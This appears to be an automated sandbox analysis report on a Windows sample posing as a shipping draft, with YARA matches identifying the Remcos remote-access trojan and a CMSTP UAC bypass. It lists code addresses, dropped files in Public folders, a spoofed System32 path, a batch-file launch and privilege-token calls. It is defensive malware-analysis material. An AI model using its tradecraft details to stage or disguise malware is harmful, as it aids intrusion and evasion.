Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC72220	32_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7D250	32_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC79E50	32_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC77650	32_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC75240	32_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC76BE0	32_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9AFBC	32_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC75B70	32_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC73F90	32_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7372C	32_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC79B50	32_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC7B0D8	32_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC78510	32_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC818D4	32_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC71884	32_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC72C48	32_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 32_2_00007FF70CC9AC4C	32_2_00007FF70CC9AC4C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC78DF8	34_2_00007FF70CC78DF8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC85554	34_2_00007FF70CC85554
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7AA54	34_2_00007FF70CC7AA54
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC837D8	34_2_00007FF70CC837D8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC73410	34_2_00007FF70CC73410
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC87854	34_2_00007FF70CC87854
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7CE10	34_2_00007FF70CC7CE10
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9D9D0	34_2_00007FF70CC9D9D0
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC781D4	34_2_00007FF70CC781D4
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC77D30	34_2_00007FF70CC77D30
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CCA1538	34_2_00007FF70CCA1538
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC76EE4	34_2_00007FF70CC76EE4
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC97F00	34_2_00007FF70CC97F00
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC80A6C	34_2_00007FF70CC80A6C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9EE88	34_2_00007FF70CC9EE88
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7E680	34_2_00007FF70CC7E680
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9AA30	34_2_00007FF70CC9AA30
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC74A30	34_2_00007FF70CC74A30
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC84224	34_2_00007FF70CC84224
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC72220	34_2_00007FF70CC72220
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7D250	34_2_00007FF70CC7D250
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC79E50	34_2_00007FF70CC79E50
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC77650	34_2_00007FF70CC77650
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC75240	34_2_00007FF70CC75240
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC76BE0	34_2_00007FF70CC76BE0
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9AFBC	34_2_00007FF70CC9AFBC
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC75B70	34_2_00007FF70CC75B70
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC73F90	34_2_00007FF70CC73F90
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7372C	34_2_00007FF70CC7372C
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC79B50	34_2_00007FF70CC79B50
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC7B0D8	34_2_00007FF70CC7B0D8
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC78510	34_2_00007FF70CC78510
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC818D4	34_2_00007FF70CC818D4
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC71884	34_2_00007FF70CC71884
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC72C48	34_2_00007FF70CC72C48
Source: C:\Users\Public\alpha.exe	Code function: 34_2_00007FF70CC9AC4C	34_2_00007FF70CC9AC4C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044B040	36_2_0044B040
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0043610D	36_2_0043610D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00447310	36_2_00447310
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044A490	36_2_0044A490
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0040755A	36_2_0040755A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0043C560	36_2_0043C560
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044B610	36_2_0044B610
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044D6C0	36_2_0044D6C0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_004476F0	36_2_004476F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044B870	36_2_0044B870
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044081D	36_2_0044081D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00414957	36_2_00414957
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_004079EE	36_2_004079EE
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00407AEB	36_2_00407AEB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044AA80	36_2_0044AA80
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00412AA9	36_2_00412AA9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00404B74	36_2_00404B74
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00404B03	36_2_00404B03
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_0044BBD8	36_2_0044BBD8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00404BE5	36_2_00404BE5
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00404C76	36_2_00404C76
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00415CFE	36_2_00415CFE
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00416D72	36_2_00416D72
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00446D30	36_2_00446D30
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00446D8B	36_2_00446D8B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 36_2_00406E8F	36_2_00406E8F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00405038	37_2_00405038
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0041208C	37_2_0041208C
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004050A9	37_2_004050A9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0040511A	37_2_0040511A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0043C13A	37_2_0043C13A
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004051AB	37_2_004051AB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00449300	37_2_00449300
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0040D322	37_2_0040D322
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0044A4F0	37_2_0044A4F0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0043A5AB	37_2_0043A5AB
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00413631	37_2_00413631
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00446690	37_2_00446690
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0044A730	37_2_0044A730
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004398D8	37_2_004398D8
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_004498E0	37_2_004498E0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0044A886	37_2_0044A886
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0043DA09	37_2_0043DA09
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00438D5E	37_2_00438D5E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00449ED0	37_2_00449ED0
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_0041FE83	37_2_0041FE83
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 37_2_00430F54	37_2_00430F54

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\Public\Libraries\glrkszlG.pif 7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 028B7CC8 appears 43 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 27974E10 appears 54 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 028A480C appears 606 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 004169A7 appears 87 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 004165FF appears 35 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 00422297 appears 42 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 0044DB70 appears 41 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 028A6650 appears 37 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 00444B5A appears 37 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 028A46A4 appears 152 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 00413025 appears 79 times
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: String function: 00416760 appears 69 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF70CC96D1C appears 36 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF70CC83448 appears 108 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF70CC8498C appears 60 times
Source: C:\Users\Public\alpha.exe	Code function: String function: 00007FF70CC8081C appears 54 times
Source: C:\Users\Public\ger.exe	Code function: String function: 00007FF7E0A3D3D0 appears 56 times

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Yara signature match

Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 39.2.Glzskrlg.PIF.26e20000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 39.2.Glzskrlg.PIF.26e20000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000027.00000002.1894385900.000000007EC30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 00000027.00000002.1879306334.0000000026E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 00000000.00000002.4114575191.00000000279AB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe PID: 7252, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: Glzskrlg.PIF PID: 7780, type: MEMORYSTR	Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@67/28@3/4

Source: C:\Users\Public\alpha.exe

5_2_00007FF70CC732B0

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27957952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,		0_2_27957952
Source: C:\Users\Public\ger.exe	Code function: 16_2_00007FF7E0A33F5C GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,CloseHandle,AdjustTokenPrivileges,CloseHandle,		16_2_00007FF7E0A33F5C

Source: C:\Users\Public\alpha.exe

Code function: 5_2_00007FF70CC9FB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z,

5_2_00007FF70CC9FB54

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2794F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,

0_2_2794F474

Source: C:\Windows \System32\per.exe

Code function: 17_2_00007FF6FEF92850 CoInitializeEx,CoCreateInstance,WindowsGetStringRawBuffer,

17_2_00007FF6FEF92850

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795B4A8 FindResourceA,LoadResource,LockResource,SizeofResource,

0_2_2795B4A8

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,

0_2_2795AC78

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Users\Public\xkn.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Mutant created: \Sessions\1\BaseNamedObjects\CorelDraw-OW5ET7
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7396:120:WilError_03

Source: C:\Users\Public\Libraries\glrkszlG.pif

File created: C:\Users\user\AppData\Local\Temp\18A2.tmp

Jump to behavior

Source: C:\Users\Public\Libraries\glrkszlG.pif

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\18A2.tmp\18A3.tmp\18A4.bat C:\Users\Public\Libraries\glrkszlG.pif"

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Glzskrlg.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

System information queried: HandleInformation

Source: C:\Windows\System32\taskkill.exe

Source: C:\Users\Public\Libraries\glrkszlG.pif

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe, 00000024.00000002.1865964379.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Binary or memory string: SELECT 'INSERT INTO vacuum_db.' \|\| quote(name) \|\| ' SELECT * FROM main.' \|\| quote(name) \|\| ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
